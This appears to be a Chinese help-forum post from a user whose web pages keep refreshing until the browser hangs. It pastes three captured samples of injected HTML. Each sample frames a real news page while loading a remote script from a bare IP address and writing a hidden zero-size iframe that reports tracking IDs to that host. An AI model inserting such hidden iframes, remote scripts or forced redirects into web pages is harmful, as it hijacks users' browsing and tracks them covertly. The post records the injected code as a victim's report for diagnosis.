发作症状
随机出现.打开一个网页一直刷新.直到网页死机关闭.
下面的样本是在网页死机关闭前查看的源文件
本机装了冰点还原.瑞星杀毒.防火墙.卡助手.都没有查出异常
样本一
<html>
<head><title> </title>
<style>html{ overflow:hidden; }</style>
<script>
<!--
function goURL()
{
var desturl="
http://kefu.xoyo.com/gonggao/jxsj/2009-06-15/661817.shtml";
if (desturl.slice(desturl.length-1)=="/" ) desturl=desturl.slice(0,desturl.length-1);
return "<html></head><script>document.location.replace(\""+desturl+"\");<\/script><\/html>";
}
var pushsn = "1245030806";
var aduser = "aHM4MDQ1MDQy";
var adfile = "ad090527102039.php";
//-->
</script>
</head>
<body style="margin:0px;overflow:hidden;" scroll="no">
<iframe id="ifrName" width="100%" height="100%" frameborder="no" scrolling="yes" src="JavaScript:parent.goURL();"></iframe>
<script id="adjs" src="
http://61.183.0.79:3437/js/wpopup.js"></script>
<script>
<!--
setTimeout("top.document.location.href=document.getElementById('ifrName').src",30000 );
//-->
</script>
<script>
<!--
var adurl="
http://61.183.0.79:3437/push_count.php?aduser="+aduser+"&pushsn="+pushsn;
document.write("<IFRAME width=\"0\" height=\"0\" src=\""+adurl+"\"></IFRAME>");
//-->
</script>
</body>
</html>
样本二
<html>
<head><title> </title>
<style>html{ overflow:hidden; }</style>
<script>
<!--
function goURL()
{
var desturl="
http://www.sina.com.cn/";
if (desturl.slice(desturl.length-1)=="/" ) desturl=desturl.slice(0,desturl.length-1);
return "<html></head><script>document.location.replace(\""+desturl+"\");<\/script><\/html>";
}
var pushsn = "1245030806";
var aduser = "aHM4MDQ1MDQy";
var adfile = "ad090527102039.php";
//-->
</script>
</head>
<body style="margin:0px;overflow:hidden;" scroll="no">
<iframe id="ifrName" width="100%" height="100%" frameborder="no" scrolling="yes" src="JavaScript:parent.goURL();"></iframe>
<script id="adjs" src="
http://61.183.0.79:3437/js/wpopup.js"></script>
<script>
<!--
setTimeout("top.document.location.href=document.getElementById('ifrName').src",30000 );
//-->
</script>
<script>
<!--
var adurl="
http://61.183.0.79:3437/push_count.php?aduser="+aduser+"&pushsn="+pushsn;
document.write("<IFRAME width=\"0\" height=\"0\" src=\""+adurl+"\"></IFRAME>");
//-->
</script>
</body>
</html>
样本三
<html>
<head><title> </title>
<style>html{ overflow:hidden; }</style>
<script>
<!--
function goURL()
{
var desturl="
http://news.xinhuanet.com/world/2009-06/15/content_11544755.htm";
if (desturl.slice(desturl.length-1)=="/" ) desturl=desturl.slice(0,desturl.length-1);
return "<html></head><script>document.location.replace(\""+desturl+"\");<\/script><\/html>";
}
var pushsn = "1245030806";
var aduser = "aHM4MDQ1MDQy";
var adfile = "ad090527102039.php";
//-->
</script>
</head>
<body style="margin:0px;overflow:hidden;" scroll="no">
<iframe id="ifrName" width="100%" height="100%" frameborder="no" scrolling="yes" src="JavaScript:parent.goURL();"></iframe>
<script id="adjs" src="
http://61.183.0.79:3437/js/wpopup.js"></script>
<script>
<!--
setTimeout("top.document.location.href=document.getElementById('ifrName').src",30000 );
//-->
</script>
<script>
<!--
var adurl="
http://61.183.0.79:3437/push_count.php?aduser="+aduser+"&pushsn="+pushsn;
document.write("<IFRAME width=\"0\" height=\"0\" src=\""+adurl+"\"></IFRAME>");
//-->
</script>
</body>
</html>
用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)